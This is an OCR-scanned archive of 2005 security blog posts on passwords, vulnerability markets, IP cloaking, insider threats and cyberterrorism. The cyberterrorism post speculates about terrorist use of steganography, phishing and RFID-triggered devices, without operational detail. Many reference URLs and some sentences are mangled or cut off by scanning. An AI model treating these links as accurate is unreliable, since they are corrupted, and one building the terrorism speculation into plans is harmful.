2005 


1.1 December 


1.1.1 How to create better passwords - why bother?! (2005-12-07 16:43) 


| have recently came across a practical article on [1]how to create a better passwords, couresy 
of [2]CSO Magazine. 

It reminded me of how many times | find myself actually getting into 

the science of passwords maintenance and creation in order to enforce 

real-life, cost-effective scenarios, while on the other hand, get myself 

seriously concerned on how easy it is to have your accounting data abused! 


During the years | have written several articles, like this one - [3]Creating and Maintain- 
ing Strong Passwords, 

mainly with the idea to actually provide a pragmatic approach on 

tackling weak, and prone to be cracked passwords. The result, at least 

from a sniffing point of view *grin* was that most of my friends lacking 

security knowledge, were indeed getting concerned by their easy to 

guess passwords. Later on, they were turning them into entire 

passphrases with the idea to avoid not having them cracked. That’s an 

example of a "false feeling of security". 


And while it was a 

progress compared to how predictable their passwords really were, strong 

passwords doesn’t address the following issues that | later on covered 

in another article - [4]Passwords - Common Attacks and Possible Solutions, namely, passwords 
can be: 


- Sniffed 


- Recovered 


- Unintentionally shared 
- Keylogged 


- etc. 


Recently, both from a CSO’s point of view, and the financial industry, [5]two factor au- 
thentication, 

has been gaining a lot of acceptance, in my opinion primary because of 

its tangibility. It greatly improves the authentication process, given 

the integrity of the system, and the network itself. And while from an 

organization’s or bank’s point of view providing tokens to the entire 

work force would represent a huge investment, | strongly feel 

prioritizing in respect to important customers, and executives will play 

an important role. 


On October 12, 2005, the [6]Federal Financial Institutions Examination Council, released its 
[7]Guidance on Authentication in Internet Banking Environment, thereby enforcing the use of 
advanced, compared to passwords based only, authentication approaches. 


Would it work? | doubt so, but it limits the age-old attacks we are so used to seeing in respect 
to passwords. 


[8]Bruce Schneier has been discussing the [9]dangers of the two factor authenticaion buzz, 
and as far as online banking is concerned, Candid Wuest has written a very good paper on 
[10]Today’s threats to online banking, 
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namely the techniques discussed fully apply to any type of 
authentication. Passwords are out of the topic, even two factor 
authentications has its good and bad sides to it comes to end users’ 
awareness, implementation and configuration. 


What are the practical alternatives these days? 


[11]Password Safe 

is a bit unpractical(still works for lots of people out there) in 

today’s interconnected world, namely, a HDD crash for instance would 

cause a lot of trouble to everyone, let’s not mention the "availability" 

of the data. [12]JustlKey 

seems to solve this problem to a certain extend. | also recommend you 

verify the strenght of your passwords by taking advantage of the [13]Password Strenght 
Meter [14]ComputerWeekly, are also running an article "[15]Security : have passwords had 
their day?", 

they sure haven't, at least not on a large scale, the way I’ve always 

wanted to see it - One Time Passwords in Everything! Check out [16]RSA’s [17]One-Time 
Password Specifications , the concept in itself has the time frame advantage! 


Further reading on the topic can be found at : 


[18]The Memorability and Security of Passwords - Some Empirical Results 
[19]Passwords you'll never forget, but can’t recall 


[20]One Time Passwords In Everything (OPIE) : Experiences with Building and Using Stronger 
Authentication 


[21]Stealing passwords via browser refresh 


[22]A Convenient Method for Securely Managing Passwords 


Technorati tags : 


[23]passwords,[24]access control,[25]authentication,[26]information 
security,[27]security,[28 Jidentification 


1 
2. 

3 

4 
5. 

6. 

6 


ttp://en.wikipedia.org/wiki/Two_Factor_Authenticatio 


ttp://www.ffiec.gov/ 


7. http://www.ffiec.gov/press/pr101205.htm 
8. http: //www.schneier.com/ 
9. http: //www.schneier.com/blog/archives/2005/03/the_failure_of.htm 


10. http://www.astalavista.com/index.php?section=directory&linkid=5659 


11. http://www.schneier.com/passsafe.htm 

12. http://www. justikey.com/ 

13. 
14. http://www. computerweekly.com/ 

15. http://www. computerweekly.com/Articles/2005/12/06/213268/Securityhavepasswordshadtheirday .htm 
16. https: //web.archive.org/web/20101016193540/http://www.rsasecurity.com, 


~ 


17. http://www.rsasecurity.com/rsalabs/node.asp?id=2816 


18. http://www.ftp.cl.cam.ac.uk/ftp/users/rja14/tr500. pdf 


19. http://www.cs.huji.ac.il/~kirk/Imprint_CHI04_final.pdf 


20. http://chacs.nrl.navy.mil/publications/CHACS/1995/1995mcdonald-USENIX. pdf 


21. http://www. infosecwriters.com/text_resources/pdf/Stealing_passwords_via_browsers.pdf 


22. http://www.cs.princeton.edu/~jhalderm/papers/www2005. pdf 


23. http://technorati.com/tag/passwords 
24. http://technorati.com/tag/accesst+contro 


25. http://technorati.com/tag/authenticatio 
26. http://technorati.com/tag/informationtsecurit 


27. http://technorati.com/tag/securit 


28. http://technorati.com/tag/identificatio 


1.1.2 Obay - how realistic is the market for security vulnerabilities? (2005-12-12 16:40) 


In [1]lssue 19 (July, 2005) of the [2]Astalavista Security Newsletter that | release on a monthly 
basis, | wrote an article entitled "Security Researchers and your organization caught in be- 
tween?" whose aim was to highlight a growing trend, namely the monetization of vulnerability 
research, who benefits and who doesn’t. 


A 

recent, rather significant event at least for me covering and 

monitoring this issue for quite some time now, was an Ebay listing for a 

"[3]brand new Microsoft Excel vulnerability". A bit ironical, but | had a chat with Dave Endler, 
director of security research at [4]TippingPoint, and 

the issue of their future position as bidders for someone else’s 

research were discussed a week before the Ebay’s listing in [5]lssue 23 (November, 2005) of 
Astalavista’s Security Newsletter. 


[6] #8 


Two of today’s most popular, and at least public commercial entities paying hard cash for 
security vulnerabilities are : [7]iDefense, and the [8]ZeroDaylnitiative (TippingPoint). 


[9] * But 

what is the need for creating such a market? Who wins and who loses? 
What are the future global implications for this trends, originally 
started by [10]iDefense? 


In 

any market, there are sellers and buyers, that’s the foundation of 

trade besides the actual exchange of goods/services and the associated 

transaction. What happens when buyers increase, is that sellers tend to 

increase as well, and, of course, exactly the opposite. Going further, 

every economy, has its black/underground or call it whatever you want 

variation. And while some will argue a respected researcher will 

contribute to the the development of even more botnets, who says it has 

to be respected to come with a vulnerability worth purchasing?! It’s a [11]Metasploit world, 
isn’t it?! 


Going 

back to the market’s potential. Sellers get smarter, transparency is 
build given more buyers join seeking to achieve their objectives in this 
case, provide proactive protection to their clients only, and build an 
outstanding, hopefully loyal researchers’ database. These firms, to 
which | refer as buyers have happened to envision the fact that there 
are thousands of skilled vulnerability researchers’, who are amazingly 
capable, but aren’t getting a penny out of releasing their 
vulnerabilities research. Ego is longer important, and getting $ for 
research on a free will basis is a proven capitalistic approach. What 
these companies(and | bet many more vendors will open themselves for 
such a service) didn’t take into consideration in my opinion, is that, 
starting to work with people giving $ as the ultimate incentive will 
prove tricky in the long-term. 


What will happen of the Swiss 

cheese of software(yet the one that dominates 95 % of the OS market 
today) Microsoft starts bidding for security vulnerabilities in its 
products? Bankruptcy is not an option, while | doubt they will ever take 
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this into consideration, mainly because it would seriously damage a 
market sector, the information security one. Imagine, just for a sec. 
that Microsoft decides to seriously deal with all its vulnerabilities? 

But today’s lack of accountability for software vendors’ actions related 
to vulnerabilities is making it even worse. If MS doesn’t get sued for 
not releasing a patch in any time frame given, why should we, the small 
compared to MS vendor care? 


Howard Schmidt, former White House 

cybersecurity adviser, once proposed that programmers should be held 
responsible for releasing vulnerable code. | partly agree with him, you 
cannot cut costs in order to meet product/marketing deadlines while 
hiring low skilled programmers who do not take security into 
consideration, which opens another complex discussion on what should a 
developer focus on these days - efficiency or security, and where’s the 
trade-off? 


| originally commented on this event back then : 


The 

position of Schmidt prompts him to address critical issues and look for 
very strategic solutions which may not be favored by the majority of the 
industry as I’m reading through various news comments and blogs. | 
personally think, he has managed to realize the importance of making a 
distinction in how to tackle the vulnerabilities problem,who’s involved, 
and who can be influenced, where the ultimate goal is to achieve less 
vulnerable and poorly coded software. Software vendors seek 
profitability, or might actually be in the survival stage of 

their existence, and as obvious as it may seem, they facts huge costs, 
and extremely capable coders or employees tend to know their price! 


What’s the mention are the tech industry’s “supposed to be” benchmarks 
for vulnerabilities management, picture an enterprise with the “IE is 

the swiss cheese in the software world in terms of vulnerabilities, and 
yet no one is suing Microsoft over delayed patches” - lack of any 
incentives, besides moral ones, in case there’re clear signs and 
knowledge that efficiency is not balanced with security. And that’s 

still a bit of a gray area in the development world. 


Vulnerabilities 

simply cannot exist, and perhaps the biggest trade-off we should also 
face is the enormous growth of interactive applications, innovation 
approaches for disseminating information, with speeds far outpacing the 
level of attention security gets. Eventually, we all benefit out of it, 

web application vulnerabilities scanners and consultants get rich, 
perhaps the (ISC)? should take this into consideration as well :-) 


Even though you could still do the following : 


- build awareness towards common certifications addressing the issue 


ensure your coders understand the trade-offs between efficiency and 
security and are able to apply certain marginal thinking, whereas still 
meet their objectives 


- as far as accountability is 
concerned, do code auditing with security in mind and try figure out who 
are those that really don’t have a clue about security, train them 


- constantly work on improving your patch release practices, or fight the problem from 
another point of view 


But unless, coders, and software vendors aren’t given incentives, or 

obliged under regulations (that would ultimately result in lack of 

innovation, or at least a definite slow down), you would again have to 

live with uncertainly, and outsource the threats posed by this issue. M 

icrosoft’s “[12]Improving Web Application Security: Threats and Countermeasures” book, still 
provides a very relevant information. 


[13]Slashdot’s discussion 


What 

also bothers me, is how is the virginity of the vulnerability 

identified? | mean, what if | have already found it, developed an 
exploit for it, sold it to the underground, and cashed with the industry 
as well, and no one came across it on his/her :) honeyfarm? The 
researcher’s reputation is a benchmark, but in the long-term, the 
competitive market that’s about to appear, will force the buyers to 
start working on a mass basis. There’s a definitely a lot to happen! 
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Welcome to the wonderful world of purchasing [14]0-day 

security vulnerabilities! Have an enemy, bid for his ownage, have a 
competitor, own them without having to attract unnecessary attention, 
I’m just kiddin’ of course, although the possibilities are disturbing. 


What 

| really liked about this important moment in vulnerability research, 
was that it was about time the security researchers wanted to see how 
valued their research is in terms of the only currency that matters in 
the process - the hard one. In my point of view, monetizing the 
vulnerabilities research market wasn’t the best strategic approach on 
fighting 0-day vulnerabilities, in this case, ensure you have the most 
impressive minds on your side, and that your clients get hold of the 
latest vulnerabilities before the public does. 


So - who’s the winner - it’s...[15]Symantec 

who first realized the long-term importance of security 

vulnerabilities, and where, both researchers and actual vulnerabilities 

are - Bugtraq/SecurityFocus, by [16]acquiring it for US $75 million in cash, back in 2002, and 
later one integrating its joys into the [17]DeepSight Analyzer - remarkable. Both from a 
strategic point of view, and mainly because that, by the time any post on any of 

the associated mailing lists doesn’t get approved, it’s Symantec’s 

staff having first look at what’s to come for the day of everyone. 


SecurityFocus is running a story about the [18]Ebay vulnerability listing, and so is [19]eWeek, 
[20]Slashdot also picked up the story. It was about time for everyone, given it actually 
happened during the weekend :-) 


UPDATE : "[21]Where’s my Oday, please? 
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Recommended reading can be found at : 

[22]Vulnerability Disclosure Framework 

[23]A Structured Approach to Classifying Security Vulnerabilities 
[24]Guidelines for Security Vulnerability Reporting and Response 
[25]Economic Analysis of Incentives to Disclose Software Vulnerabilities 


[26]lmpact of Software Vulnerability Announcements on the Market Value of Software 
Vendors - an Empirical Investigation 


[27]An Economic Analysis of Market for Software Vulnerabilities 
[28]Market for Software Vulnerabilities? Think Again 


[29]Talking about 0-day 


Some stats : 
[30]National Vulnerability Database 


[31]CERT/CC Statistics 1988-2005 


Technorati tags : 


[32]security vulnerabilities,[33]vulnerabilities,[34]exploits ,[35]botnets,[36]Oday,[37 ]full 
disclosure 


1. http: //www.astalavista.com/media/archive1/newsletter/issue_19_2005.pdf 
2. http: //www.astalavista.com/index.php?section=newslette 
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. http: //www.securityfocus.com/bid/15780/info 
. http://tippingpoint.com/ 


ttp://www.astalavista. com/index. php?section=directory&linkid=570 


. http://photos1. blogger . com/blogger/1933/1779/1600/iDefense. gif 
. http://www.idefense.com/ 
. http: //www.zerodayinitiative.com/ 


ttp://photos1. blogger . com/blogger/1933/1779/1600/zero-day-initiative. jpg 


0. http://www. idefense.com/ 
1. http://www.metasploit.com/ 
2: 


15, hep: //aww.synantec.cond 
| hetp://wny. symantec. con/press/2003/a030806 tal 
 fep://awy, securitytocus_con/ueve/ i369 
| nttp:/ /wiy.eveek.con/article2/0, 1896, 1899697, 00. aap 


. bttp://it.slashdot.org/it/05/12/12/1215220.shtm1?tid=128kamp ; amp; amp;amp; amp;amp; amp;amp; amp;tid=109&tid 
21. 
22. 
23. 


24. http://www. oisafety.org/guidelines/Guidelines/20for/Z20Security/20Vulnerability/20Reporting%20and/,20Respo 


25. 

26 

27. 

28. http://mansci.pubs.informs.org/e_companion_pages/May_05_EC/Kanan_Telang_EC.pdf 
29. 
30. 

31. 

22. 

33, 

34 

35 

36. 

37. 


1.1.3 IP cloaking and competitive intelligence/disinformation (2005-12-14 16:36) 


[1]SearchSecurity.com are running a great article entitled "[2]IP cloaking becoming a 
business necessity", that | simply can’t resist to express my opinion on. 
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[3] * Great concept that’s been around since the days of [4]Anonymizer, who were perhaps 
the first enterprise to start targeting enterprise and government 


users looking for ways to hide their online activities, be it [5]unstructured data aggregation, 
[6]competitive intelligence or simple end users’ browsing. 


Getting 

back to SearchSecurity’s article, | don’t really consider a company’s 
SEC fillings or annual reports (found on any corporate web site) a trade 
secret! In this particular case, | bet it was extraoridinary traffic 

from known partners that tipped them that there’s a sudden interest in 
the company’s business performance. Any organization could easily look 
for patters on its web server, such as how often certain stakeholders 
visit it, given they use their associated netblocks, or ones known to be 
used by them. What to also to note is that, given the stakeholders in 
this case, employees, stockholders, suppliers, government, the general 
public or anyone else has a claim on the way the organization operates, 
it would be hard, pretty much impossible to differentiate intentions of 
any of these. 


Small companies can easily measure their popularity 

among the big players, again, given these companies use their 
netblocks, but a large corporation with hundreds of thousands visitors, 
would have to put extra efforts in measuring, not only what’s popular, 
but who’s reading it, and are they on our watchlist. 


How to compile these? Even though I’m certain someone out there has taken the time and 
effort to compile a [7]Fortune 500 IP ranges list the way [8]GovernmentSecurity.org have 
compiled a [9]Government &Military; IP ranges list. 

| soon expect to see companies offering segmented service for 

watchlists like the ones | mentioned, for instance - law firms, 

financial institutions, non-profit organizations segmented on 

geographical location, let’s say New York or Tokyo based ones. An 

in-house approach can always be applied by any company, no matter of its 

size, all you have to do is your homework at [10]RIPE.net for instance : 


[11]RSA Security 
[12]Symantec 
[13]Sophos 
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[14]Kaspersky 


[15]ISS(Internet Security Systems) 


An important trend though, is how the transparency that the [16]ICANN 

wants to build whenever a domain is registered in order to easily 

prosecure cyber criminals will open up countless opportunities for open 

source intelligence professionals or wannabe’s. A recently released [17]report by the [18]U.S 
Government Accountability Office, found [19]2.3M domain names registered with false data, 
given that’s just the result they came up by sampling. Here’re also the [20]important findings. 


Without any doubt, it should be known who’s who in the Internet’s 
domain and IP blocks space, but knowing it and complying with this due 
to regulations, or good will is going to lead to further consequences 

for your organization. 


Let’s take anti-virus vendors for 

instance. | often say that anti virus is a necessary evil - given it’s 
active!! Signatures based defense is futile, windows of opportunities 
emerge faster, Oday threats contribute, and overall, malware is starting 
to attack on a segmented based level => less major outbreaks, but 
the rates of signature updates is still a benchmark the public and some 
of the vendors like talking about. [21]Email-Worm.Win32.Doombot.b 
for instance, is a good example of how the malware author is rendering 
the antivirus software into a useless application, just by blocking it 
from accessing its(publicly available, easy to find out through sniffin’ 
etc.) update locations. 


Even though the author wish he/she could 

"write" to these locations, that’s not necessary, but the temporary 

advantage of exposing the user/organization to a particular window of 

opportunity, by making sure access to removal instructions and actual 

updates is disabled! Doombot’s list is short, and a bit of a common 

sense one compared to [22]others. And as always, the general public, sick of ads, and 
parasites, have taken the effort to constantly release updated [23]hosts 

files to tackle their concerns. | wonder when, and how are vendors 

going to address this important from my point of view issue? 


IP 
cloaking at the corporate level is still in its early stages, but 
represents a growing market due the following factors, among many others 
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of course: 


- governments and intelligence agencies are actively taking advantage of [24]open source 
intelligence, [25]OSINT, and vendors are already starting to offer [26]relevant services. The 
Anonymizer among others, has also specially government/enterprise tailored [27]services 


enterprises are getting extremely conscious about what others know of 
their surfing interests, and what are stakeholders on their watchlist 
looking at, on any of their extranets or corporate web sites 


- citizens from countries with extremely restrictive Internet censorship practices will fuel the 
market’s growth even more 


Further reading can be found at : 
[28]Protecting Corporations from Internet Counter-Intelligence 


[29]Cloaking types 


Technorati tags : 


[30]competitive intelligence,[31]anonymity,[32]ip cloaking,[33]OSINT 


1. 

2. http: //searchsecurity.techtarget.com/originalContent/0, 289142, sid14_gci1151253, 00.html?track=sy160 
3. 

‘ 

5 

6 

ve 

8. 

9. 


10. 
11. http://www.ripe.net/cgi-bin/search/gdquery.cgi?index=ripedb&amp; amp;amp; amp; amp;amp; amp;amp;file-match=ne 


45B6n/,5D&boolean=and&max-results=100&page-results=10&s 


12. http://www.ripe .net/cgi-bin/search/gdquery.cgi?index=ripedb&amp; amp;amp; amp; amp;amp; amp;amp;file-match=ne 


45B6n/,5D&boolean=and&max-results=100&page-results=10&s 
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13. http: //www.ripe.net/cgi-bin/search/gdquery.cgi?index=ripedb&amp ; amp; amp;amp; amp; amp;amp; amp;file-match=ne 


45B6n/,5D&boolean=and&max- results=100&page-results=10&s 


14. http://www.ripe.net/cgi-bin/search/gdquery.cgi?index=ripedb&amp ; amp; amp;amp; amp; amp; amp; amp ;file-match=ne 


15. http://www.ripe.net/cgi-bin/search/gdquery.cgi?index=ripedb&amp ; amp; amp;amp; amp; amp;amp; file-match=net/5B 
16. 

_hvep://ewsguo. gov/nev. ens /a06i65 pl 
18. 


ttp://www.networkworld.com/news/2005/120905-domain-names.htm 
ttp://www.gao.gov/highlights/d06165high. pdf 


ttp://www.viruslist .com/en/viruses/encyclopedia?virusid=96944 


. http://www.viruslist.com/en/viruses/encyclopedia?virusid=74841 
23. http://www.mvps.org/winhelp2002/hosts. txt 
ttp://en.wikipedia.org/wiki/Open_source_intelligence 


ttps://web.archive.org/web/20101016193540/http://www.cia. gov/csi/studies/vol48no03/article05. htm 


26. http://www.sail-technology. com/index. html?solutions/html/osint.htm 
27. http://www. anonymizer.com/government/solutions/ 


ttp://www.antiphishing. org/sponsors_technical_papers/Internet/20Counter-Intelligence/20White/20Paper . pdf 


29, http: //wve.searchanginevor]d,con/niee/loating.egeats tn 
_http://technorats. con/tag/competitive+ intelligenca 
31. http: //cechnorati. con/tag/anonynity 

| hetp://technorats. con/tag/ipreloaking 
| http://technorat.con/tag/0SIN 


1.1.4 Insiders - insights, trends and possible solutions (2005-12-19 12:22) 


A recent research of the content monitoring market, and the U.S 2004’s "[1]Annual Report to 
Congress on Foreign Economic Collection and Industrial Espionage" I’ve recently read, 
prompted me to post an updated opinion on this largely unsolved issue. 


| have been keeping an eye on the insider problem for quite some time, in fact, | have 
featured a short article entitled “Insiders at the workplace - trends and practical risk 
mitigation approaches” in [2]lssue 18 of the monthly [3]security newsletter you can freely 
subscribe yourself to! 


Insider as a definition can be as contradictive as the word “cheater” is :-) Does an individual 
become an insider even when thinking about it, or turns into such prior to initiating an action 
defined as insider’s one? The same way, can someone be defined as a “cheater” just for 
thinking about what’s perceived as cheating, compared to actually doing anything?! :-) When 
does one become the other, and is this moment of any importance to tackling the problem? 


The biggest trade-off as far as the insider’s problem is concerned is between dealing with the 
problem while ensuring productivity, and that the company’s work environment isn’t 
damaged - exactly the opposite. And while productivity is extremely important, the direct, or 
most often indirect and long-term loss of intellectual property theft is currently resulting in a 
couple of billion dollar unmaterialized revenues for nations/enterprises across the globe. 
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Going through 2004's “[4]Annual Report to Congress on Foreign Economic Collection and 
Industrial Espionage”, a major trend needs to be highlighted as | greatly believe it’s a global 
one, namely, private enterprises efforts to obtain access to sensitive technologies in 
unethical way, outpaces a foreign government’s efforts to do the same. Corporations spy 
more on one another than governments do, but is this truly accurate? | don’t think so! The 
use of freelancers, among them ex-intelligence officers or experienced detective agencies to 
conduct national funded economic espionage is a growing trend, and the lines in this area are 
so blur, we should therefore try to grasp the big picture when it comes to national 
competitiveness - both companies and nations directly/indirectly benefit from possible 
economic/industrial espionage, and you can’t deny it! 


Yet another important fact to keep in mind, is the unusually high success of the oldest, and 
most common sense social engineering attack - asking!! In certain cases a social engineer 
will inevitably establish contact with customer-service obsessed personnel taking care of you 
all your requests! A certain organization’s members may experience troubles differentiating 
sensitive and secret information, not taking the first one as serious as they should. Even 
worse - U.S Secret Service and CERT’s “[5]lnsider threat Study : Illicit Cyber Activity in the 
Banking and Finance sector” reveal that,”83 % of the insider threat cases took place 
physically from within the insider’s organization, and another 70 % in all cases, the incidents 
took place during normal working hours”! No secretaries or CEO’s logging in at 3:00AM, and 
in this case, the lack of detected security incidents posed by insiders, means they are already 
happening! 


Though, | have always looked at the insider’s issue, from both negative and positive point of 
view. Can an insider be of any use for the good of a free speech organization or a 
government? Yes, it can if you take into account the U.S government’s efforts to locate 
democratically minded individuals living in countries with restrictive regimes, or active 
Internet censorship efforts. 

Now given, you are truly interested in the democratization of this particular region, and not 
another successful [6]PSYOPS operation, being able to locate, establish, and actually, 
maintain contact with these individuals will prove crucial in case of a objective picture of what 
exactly is going on there! Ignoring the local, totally biased news streaming for certain regions, 
and focusing on locating insiders within rogue states has been a common practice for years. 


Is there a market for protecting from intellectual property theft and sensitive information 
leakage? If so, how does it ensures today’s digital workplace, and road warriors’s flexibility is 
not sacrificed for the sake of protecting the company’s resources? Mind you, the current 
solutions scratch only the surface of the issue - creating digital signatures of data and trying 
to spot it leaving the network. While a commonly accepted approach, it’s like one way 
authentication(passwords) when it comes to access control- the first line of defense, but 
among the many other! 


The insiders’ problem is far more broader one and given the today’s complexity and 
connectivity, a possible insider’s actions will most often constitute of normal daily activities. 
But what is the market up to anyway? 


Currently, the content monitoring market is steadily growing fueled by the need of ensuring 
information marked as sensitive, or intellectual property doesn’t leave the company’s 
premises, or is alerted when someone attempts to transfer it, due to negligance or on 
purposely! 
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The main players are : [7]Vontu, [8]Tablus, [9]Reconnex, and [10]Vericept. 


Whereas these solutions are a great [11]concept,they all mainly rely on content analysis,and 
sensitive information signatures,monitoring multiple exit 
point)[12](email,web,chats,forums,p2p,ftp, even telnet), namely, reactive protection, while 
sophisticated insider’s actions may remain hidden due to covert channels or Oday 
vulnerabilities in the vendor’s product for instance! 


[13][14][15]Something else to consider, is should a |P(intellectual property) trap be 
considered as a benchmark for insider tensions?! In other words, should you consider an 
employee that has been on purposely sent a link containing company information he/she isn’t 
supposed to have access to, but has clicked to obtain it? [16]Stanford [17][18]thinks - yes! 
The University suspended potential candidates for obtaining info on their admission process 
only by following a link..you are either a one or zero, right? 


[19][20]Honeypots targeting insiders have [21]also been discussed a long time ago by 
[22]Lance Spitzner, from the Honeynet Project. Another proactive protection would be to look 
for patterns defined as malicious behavioral based mostly. 


From an organization’s point of view, take into consideration the following : 
- Clearly communicate the consequences, both individual and career, in case an insider is 
somehow identified, based on the company’s perception of the problem 


- Ensure the momentum of negative attitude towards the organization is minimized to the 
minimum to ensure the lack of to-be-developed post-effect negative sentiments 


- Do no fell victim of the common misunderstanding that technology is the key to the solution. 
Insiders are the people your technology resources empower to do their daily tasks, 
technology is as often happens, the faciliator of certain actions 
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- Does system identification accountability have any actual effect? My point, does as user’s 
loss of accounting data, resulting in successful attack is anyhow prosecuted/tolerated. If it 
isn’t, this puts any employee in extremely favorable “it wasn’t my fault” position, where the 
data could be shared, on purposely exposed, sold, pretended to be stolen etc. 


- Building active awareness towards the company’s efforts and commitment to fighting the 
problem will inevitably discourage the less motivated wannabe insiders, or at least make 
them try harder! 


From a nation’s point of view, the following issues should be taken into consideration : 

- In today’s increasingly transparent and based on digital flow of information marketplace, 
open source intelligence capabilities played a leading role in the development of 
cost-effective competitive intelligence solutions. Even though, nations or their companies are 
very interested in exploiting today’s globalized world. 


- Ensuring the adequate security level of the private and academic sectors’ 
infastructure(where research turns into products and services, or exactly the opposite) 
through legislations, or further incentives, will improve the national competitiveness, while 
preserving the current R &D innovations, as secret as necessary. 


- Outsourcing should be considered as a important factor contributing to information leakage, 
and the individuals involved, or the company’s screening practices, should be carefully 
examined. 


- A fascinating publication that | recently read is “[23]Quantifying National Information 
Leakage” describing the implications of the Internet’s distributed nature, namely to what 
extend, U.S Internet traffick is leaking around the world, where it “passes by”. A nation’s 
habit or lack of efficient alternative of plain-text communications can prove tricky if 
successfully exploited. Of course, this doesn’t include conspiracy scenarios of major 
certificate authorities breached into. 


The insiders’ problem will remain an active topic for discussion for years to come given its 
complexity and severity of implications. Insiders’s metrics are a key indicator for patterns 
tracking, whereas their creativity shouldn’t be understimated at any cost! 
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In case you are interested in various recommended reading, statistics, and other people’s 
point of view, try this research : 


[24]Understanding the Insider Threat - Proceedings of a March, 2004 Workshop 


[25]A Target-Centric Formal Model For Insider Threat and More 


[26]Analysis and Detection of Malicious Insiders 


[27 ]lnsider Threat : Real Data on a Real Problem 


[28]Insider Threat Study : Computer System Sabotage in Critical Infrastructure Sectors 


[29]Preliminary System Dynamics Maps of the Insider Cyber-threat Problem 


[30]Technological, Social, and Economic Trends That Are Increasing U.S. Vulnerability to 
Insider Espionage 


[31]Preventing Insider Sabotage : Lessons Learned From Actual Attacks 
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Technorati tags : [32]insiders,[33]insider,[34]espionage,[35]enterprise risk 
management,[36]security,[37]information security 
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1.1.5 Cyberterrorism - don’t stereotype and it’s there! (2005-12-19 15:27) 
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| wrote my first article on “[1]Cyberterrorism - an analysis”(in Bulgarian, [2]HiComm 
Magazine) back in 2003, arguing that Cyberterrorism is a fully realistic scenario, given you 
don’t picture terrorists melting down nuclear power plants over the Internet, but an 
organization determined to achieve all of its objectives, and using the digital medium to do so. 


My second article "[3]Cyberterrorism and Cyberwars - how real’s the threat?"(in Bulgarian, 
[4]ClO.bg) was greatly extended, and so was my understanding of the concept by the time. | 
often come across badly structured articles on the topic, even worse, ones starting to discuss 
the wrong concept - the biased one! Where terrorists try to attack the critical infrastructure, 
well, they wouldn’t, they’d rather abuse instead of destroying it! 


Merely evaluating a terrorist groups ability to conduct devastating DDoS attacks, or hack into 
U.S government computers, is the biased wrong concept | just mentioned. If terrorist groups 
want DDoS power, they wouldn’t rewrite their training manuals, instead, they would simply 
hire the people to do it, or request on point’n’click interface for their actions. Can this kill a 
person? If yes, how come, if not, is this Cyberterrorism at all? 


Thinking about complex topics always involves dimensional approach, understanding of 
motives, and implying a little bit of marginal thinking to grasp the big picture. Terrorists 
killing people over the Internet myth is greatly influenced by the success of any terrorist 
organization’s “PR” activities - spread fear, and build active propaganda though taking lives, 
and distributing the freely available media later on. So, if no lives are taken, why call it 
terrorism? Mainly because, cyberterrorism in my point of view isn’t an entirely new concept 
as some try to put it, it’s an extension of real life terrorism activities into cyberspace, and its 
evolution at a later stage. 


Starting from the basic premises that terrorists need to communicate with each other, keep 
themselves up-to-date in today’s [5JOSINT(open-source intelligence world), recruit potential 
members, and continue their active propaganda taking advantage of Internet’s many joys, in 
respect to anonymity(given it’s achieved), speed, and a bit of a black humor - interactivity! 


Cyberterrorism as a concept from my point of view consists of their need for : 
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- platform for communication 

No other medium can provide better speed, connectivity, and most importantly anonymity, 
given it’s achieved and understood, and it often is. Plain encryption might seem the obvious 
answer, but to me it’s [6]steganography, having the potential to fully hide within legitimate 
(at least looking) data flow. Another possibility is the use secret sharing schemes. A bit of a 
relevant tool that can be fully utilized by any group of people wanting to ensure their 
authenticity and perhaps everyone’s pulse, is [7]SSSS - Shamir’s Secret Sharing Scheme. And 
no, I’m not giving tips, just shredding light on the potential in here! The way botnets of 
malware can use public forums to get commands, in this very same fashion, terrorists could 
easily hide sensitive communications by mixing it with huge amounts of public data, while 
still keeping it secret. 


- platform for open source intelligence 


Undoubtedly, there has never been so much publicly accessible information that could aid in 
the organizing and plotting terrorist acts. Measure the impact of a certain bombing? - check 
out the news and figure out what has changed ever since, research and obtain digital photos, 
even Satellite imagery, it’s available. Try to figure out the latest specifications for RFID 
passports to come, and why it matters to you - keep on reading the specifications..! 
Transparency is always tricky! 


The way a government can successfully identify terrorist sentiments around the Web, even 
precise sites to be put under close surveillance, terrorists on the other hand keep track of 
each and every major/minor global change anyhow affecting their goals or ambitions. 


- platform for propaganda/recruitment 


Now, don’t picture “Outstanding CV, here’s the address of our training camp in Pakistan, 
please, first introduce the idea to your friends, then share the address. Nuke the planet!” 
type of conversation :-) 


Recruitment over the Internet is a contradictive topic, and many will argue that it’s irrelevant. 
| can argue too that there are people for all kinds of things, from maintaining mailings lists, to 
acting as freelancers whenever a resource, like an infected PC for anonymous communication 
is needed. Believe it or not, terrorists are silently but very actively building a web presence. 
In fact, these days you could even download execution clips directly from a terrorist’s web 
site. What’s else to note is the irony of how many [8]terrorists web sites are actually hosted 
on U.S service provider’s servers, and you keep on looking for them around the world, check 
your backyard before looking at the neighbors :-) 


Another important aspect of recruiting in such a way, is the location of people with obsessive 
islamic views, someone actively expressing his/her hate towards the U.S and actually being of 
any use. For instance, there are cases of terrorist propaganda malware, where the author(a 
teenager, or sophisticated attacks?!) clearly expresses his/her support towards a “cause”. 
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This case is like the one | mentioned in my previous post concerning [9]insiders, that is the 
way U.S government looks for [10]democracy minded individuals in restrictive regime 
countries(the Win32/Cycle.A.worm), the very same way terrorists could spot similarly minded 
individuals holding important positions or knowledge on certain topic. Are any of these 
people screaming for recruitment, and would somebody listen? 


- direct attack exploitation possibllities (people eventually die?!) 


Is the electronically obtained a major food manufacturer’s facility truck schedules of any use 
to terrorists interested in eventually hijacking and 


Someone once mentioned a scenario related to [11]U.S RFID passports, namely a bomb could 
automatically detonate, given there’re certain number of "broadcasted", note the term, U.S 
citizens around, that’s scary, but how about the same applies to mobile malware detecting 
U.S carriers for the same purpose?! 


In the last [12]article | wrote on the topic, | made an argument on where’s the line of a 19 
year’s old boy shutting down 911 through ingenious technique for the fun of it, and a terrorist 
organization exploiting vulnerability in the system at a crucial moment in time let’s say?! 
What if people die out of the teen’s actions, but the terrorists’ attempt is quickly detected? 
Should cyberterrorism be judged based on the motives, or who’s actually behind it? | think 
it’s a combination of both! 


- indirect attack exploitation possibilities 
Should a terrorists’ use of phishing attacks, where the revenues go directly into funding 
further terrorist activities, both, cyber, real-life actions be considered an option? 


Should a terrorist’s actions for hiring a person, directly obtaining certain social numbers, 
sensitive and detailed financial information, or anything else to assist a successful identity 
theft, with the idea to impersonate for a real-life terrorist scenario be considered an option? 
Yes, they both should! 


This particular list is endless, the scenarios | can only leave to someone else’s psychological 
imagination! 


